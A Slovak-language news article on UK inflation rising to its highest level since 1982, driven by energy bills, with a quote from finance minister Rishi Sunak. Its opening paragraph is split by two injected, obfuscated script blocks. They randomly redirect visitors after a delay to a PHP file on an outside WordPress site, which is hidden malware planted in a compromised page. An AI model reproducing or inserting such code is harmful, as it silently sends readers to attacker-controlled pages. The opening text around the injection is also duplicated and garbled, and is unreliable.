Pre<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dovšetkým drahé energie sú príčinou inflácie, ktorá vo Veľkej Británii vystúpila v apríli na najvyššiu úroveň od roku 1982. Britský minister financií Rishi Sunak priznal, že vláda nie je schopná pred <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dopadmi zdražovania ochrániť všetkých obyvateľov.

Inflácia vo Veľkej Británii vystúpila na 40-ročné maximum. Tamojšie domácnosti drvia účty za energie

Predovšetkým drahé energie sú príčinou inflácie, ktorá vo Veľkej Británii vystúpila v apríli na najvyššiu úroveň od roku 1982. Britský minister financií Rishi Sunak priznal, že vláda nie je schopná pred dopadmi zdražovania ochrániť všetkých obyvateľov.

Spotrebiteľské ceny vo Veľkej Británii stúpli v apríli medziročne o rovných deväť percent, ako uviedol Národný štatistický úrad. Inflácia je tak v Spojenom kráľovstve najvyššia od začiatku 80. rokov, a dokonca predčila infláciu na začiatku rokov 90., ktorú si ešte mnoho Britov dobre pamätá.

Británia čelí jednej z najvyšších mier inflácie

Veľká Británia patrí medzi veľkými ekonomikami k tým, ktoré čelia jednej z najvyšších inflácií vôbec. V rámci krajín G7 potom Spojené kráľovstvo v miere inflácie drží smutné prvenstvo. Za hlavnú príčinu rekordnej miery zdražovania možno označiť najmä rastúce ceny energií, a to vrátane zvýšenia regulovaných zložiek energetických účtov.

Pokles kúpnej sily

Jedným z dôsledkov je najväčší prepad kúpnej sily miezd Britov od 50. rokov. „Nemôžeme ľudí kompletne ochrániť pred dopadmi negatívnych globálnych faktorov, ale pomáhame tam, kde skutočne môžeme. A sme pripravení na ďalšie kroky,“ uviedol vo vyhlásení Rishi Sunak, britský minister financií.

6 komentárov

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *